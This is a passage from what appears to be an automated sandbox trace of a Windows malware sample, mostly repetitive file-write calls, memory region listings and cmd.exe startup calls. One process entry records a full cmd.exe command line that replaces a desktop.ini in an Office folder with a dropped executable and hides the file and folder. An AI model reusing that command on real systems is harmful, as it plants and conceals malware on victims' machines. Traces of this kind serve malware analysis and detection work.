lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.190] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.190] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.191] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.191] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.193] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.193] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] GetFileType (hFile=0x4c) returned 0x1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] GetFileType (hFile=0x4c) returned 0x1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.194] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.194] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x32, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] GetFileType (hFile=0x4c) returned 0x1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] GetFileType (hFile=0x4c) returned 0x1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x32, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.194] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.194] _close (_FileHandle=4) returned 0 [0152.195] FindNextFileW (in: hFindFile=0x460eb0, lpFindFileData=0x2cf4b4 | out: lpFindFileData=0x2cf4b4) returned 0 [0152.195] GetLastError () returned 0x12 [0152.195] FindClose (in: hFindFile=0x460eb0 | out: hFindFile=0x460eb0) returned 1 [0152.195] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0152.196] _close (_FileHandle=3) returned 0 [0152.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.196] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.197] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.197] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.197] SetConsoleInputExeNameW () returned 0x1 [0152.197] GetConsoleOutputCP () returned 0x1b5 [0152.197] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.197] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.197] exit (_Code=0) Process: id = "247" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20218 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20219 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20220 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20221 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 20222 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20223 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20224 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20225 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20226 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 20227 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20276 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20277 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20278 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20279 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 20280 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 20281 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20282 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20283 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20284 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20285 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20286 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20287 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20288 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20289 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20290 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 20291 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20292 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20293 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 20294 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 20295 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 20296 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 20297 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 20298 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 20299 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 20324 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 310 os_tid = 0xc78 [0152.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afbac | out: lpSystemTimeAsFileTime=0x1afbac*(dwLowDateTime=0x94957320, dwHighDateTime=0x1d440a9)) [0152.079] GetCurrentProcessId () returned 0xc54 [0152.079] GetCurrentThreadId () returned 0xc78 [0152.079] GetTickCount () returned 0x2eeff [0152.079] QueryPerformanceCounter (in: lpPerformanceCount=0x1afba4 | out: lpPerformanceCount=0x1afba4*=20886850735) returned 1 [0152.080] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0152.080] __set_app_type (_Type=0x1) [0152.080] __p__fmode () returned 0x76b331f4 [0152.080] __p__commode () returned 0x76b331fc [0152.080] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0152.080] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0152.081] GetCurrentThreadId () returned 0xc78 [0152.081] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc78) returned 0x38 [0152.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.081] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0152.081] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.081] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0152.081] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afb3c | out: phkResult=0x1afb3c*=0x0) returned 0x2 [0152.081] VirtualQuery (in: lpAddress=0x1afb73, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.081] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0152.081] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0152.081] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.081] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0152.081] GetConsoleOutputCP () returned 0x1b5 [0152.081] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.082] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0152.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.082] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0152.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.082] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 